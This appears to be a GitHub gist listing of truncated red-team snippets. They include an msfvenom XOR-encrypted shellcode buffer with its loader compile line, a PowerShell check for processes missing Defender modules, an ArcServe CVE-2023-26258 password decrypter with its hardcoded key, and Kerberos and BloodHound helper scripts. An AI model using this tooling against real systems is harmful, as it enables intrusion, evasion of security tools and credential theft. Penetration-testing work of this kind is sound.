Superseded by bloodhoundcli.
Superseded by zsh-set-proxy.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# usage: docker build -t ghcr.io/dadevel/neo4j:4.4.12 . && docker run -d --name neo4j -p 127.0.0.1:7474:7474 -p 127.0.0.1:7687:7687 -e NEO4J_AUTH=none ghcr.io/dadevel/neo4j:4.4.12 | |
FROM docker.io/library/neo4j:4.4.12 | |
# apoc version from https://neo4j-contrib.github.io/neo4j-apoc-procedures/versions.json | |
RUN wget -qO /var/lib/neo4j/plugins/apoc.jar https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/4.4.0.11/apoc-4.4.0.11-all.jar | |
# gds version from https://graphdatascience.ninja/versions.json | |
RUN wget -qO /var/lib/neo4j/plugins/gds.jar https://graphdatascience.ninja/neo4j-graph-data-science-2.2.3.jar | |
RUN echo 'dbms.security.procedures.unrestricted=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf && \ | |
echo 'dbms.security.procedures.allowlist=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Open https://portal.azure.com, select Entra ID > Company branding > Default sign-in > Edit > Layout > Custom CSS and upload this file */ | |
.ext-sign-in-box { | |
background-image: url("https://protective-branding.cloudgate.workers.dev/background.svg"); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstdint> | |
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe | |
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef | |
unsigned char buf[] = | |
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" | |
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" | |
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" | |
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# based on https://gist.github.com/S3cur3Th1sSh1t/d9aad93027aad893adae8805d59e2d73 | |
# Get-Process | Get-LoadedModules -ModuleNames 'InProcessClient.dll','InProcessClient64.dll','MinProcessClient.dll','MinProcessClient64.dll' | ?{!$_.'InProcessClient.dll' -and !$_.'InProcessClient64.dll'} | ft -auto | |
function Get-LoadedModules { | |
param( | |
[Parameter(Mandatory,ValueFromPipeline)] | |
[System.Diagnostics.Process] | |
$Processes, | |
[Parameter(Mandatory)] | |
[string[]] |
Superseded by bloodhoundcli.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
// compilation: x86_64-w64-mingw32-g++ -m64 -Wall -Wextra -std=c++20 -lstdc++ -static -Os -s -o ./ArcserveDecrypter.exe ./ArcserveDecrypter.cpp | |
// usage: ./ArcserveDecrypter.exe HEXBLOB | |
// based on https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe/blob/main/ArcServeDecrypter.c | |
constexpr unsigned char key[] = { 0x50, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x61, 0x00, 0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x70, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x61, 0x00, 0x20, 0x00, 0x76, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x64, 0x00, 0x20, 0x00, 0x70, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00, 0x77, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x64, 0x00 }; | |
constexpr auto key_len = sizeof(key); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from argparse import ArgumentParser, Namespace | |
import base64 | |
import hashlib | |
import itertools | |
import os | |
import shlex | |
import sys | |
from impacket.krb5.ccache import CCache |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from argparse import ArgumentParser, RawDescriptionHelpFormatter | |
from zipfile import ZipFile | |
import json | |
import shutil | |
# from https://github.com/fox-it/BloodHound.py/blob/273984883d9ca3dd21f6fca35ec88671cac3fc87/bloodhound/ad/trusts.py#L59 | |
TRUST_DIRECTIONS = { | |
0: 'Disabled', | |
1: 'Inbound', |
NewerOlder